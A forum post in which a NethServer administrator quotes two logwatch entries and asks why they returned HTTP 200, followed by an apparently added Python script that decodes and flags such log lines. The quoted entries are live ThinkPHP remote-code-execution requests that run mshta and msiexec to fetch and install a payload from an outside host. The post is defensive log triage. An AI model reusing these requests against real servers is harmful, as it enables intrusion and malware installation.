NethServer Version: 7.6-1810
I have logwatch running on a server. This morning I found a couple of very strange entries listed:
/?s=index%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array& vars%5B0%5D=system&vars%5B1%5D%5B%5D=mshta.exe%20vbscript:createobject(\"wscript.shell\").run(\"Cmd.exe%20/c%20for%20/l%20%i%20in%20(1,1,99)%20do%20(Msiexec%20/i%20http://Op.Cnazb.Xyz/PHP1.jpg%20/Q)\",0)(window.close) HTTP Response 200
/?s=index%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=mshta.exe%20vbscript:createobject(\"wscript.shell\").run(\"Cmd.exe%20/c%20for%20/l%20%i%20in%20(1,1,99)%20do%20(Msiexec%20/i%20http://Op.Cnazb.Xyz/PHP2.jpg%20/Q)\",0)(window.close) HTTP Response 200
The attempt is not going to do anything on a NethServer machine (at least I don’t see how it could do anything, given that it seems to refer to VB code). What puzzles me is the HTTP Response 200, which indicates success. Success at what?
Does anyone have any ideas?
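A triage sketch for entries like the two quoted above, added here as an example and not part of the original post: it URL-decodes each logwatch line, reports which path the status code was returned for, and flags the ThinkPHP `invokefunction` route along with any Windows-only programs named in the arguments. The sample lines are constructed, `example.invalid` is a placeholder host, and the names `triage` and `WINDOWS_ONLY` are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed entries in the logwatch format quoted above; example.invalid is a placeholder host.
SAMPLE = [
    '/?s=index%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array'
    '&vars%5B0%5D=system&vars%5B1%5D%5B%5D=mshta.exe%20vbscript:createobject'
    '("wscript.shell").run("Cmd.exe%20/c%20Msiexec%20/i%20http://example.invalid/a.jpg%20/Q")'
    ' HTTP Response 200',
    '/index.html?s=news HTTP Response 200',
]

# Programs named in the quoted requests; all exist only on Windows.
WINDOWS_ONLY = ("mshta.exe", "cmd.exe", "msiexec", "wscript.shell")

def triage(entry):
    """Decode one 'URL HTTP Response NNN' entry and summarise what it asked for."""
    m = re.match(r"^(.*?)\s+HTTP Response (\d{3})$", entry.strip())
    if not m:
        return None
    parts = urlsplit(m.group(1))
    # Strip keys: extraction or line wrapping can leave a space after '&'.
    q = {k.strip(): v for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    route = q.get("s", [""])[0].replace("\\", "/").lower()
    args = [v for k, vals in q.items() if k.startswith("vars[") for v in vals]
    payload = " ".join(args).lower()
    return {
        "path": parts.path,
        "status": int(m.group(2)),
        "thinkphp_probe": route.endswith("think/app/invokefunction"),
        "callback": q.get("function", [""])[0],
        "php_function": q.get("vars[0]", [""])[0],
        "windows_binaries": [t for t in WINDOWS_ONLY if t in payload],
    }

if __name__ == "__main__":
    for line in SAMPLE:
        r = triage(line)
        print(r)
        if r["thinkphp_probe"]:
            # The status belongs to the response for r["path"]; it does not by
            # itself show that the requested callback was executed.
            print(f'  -> {r["status"]} returned for {r["path"]!r}; query string targets a ThinkPHP route')
```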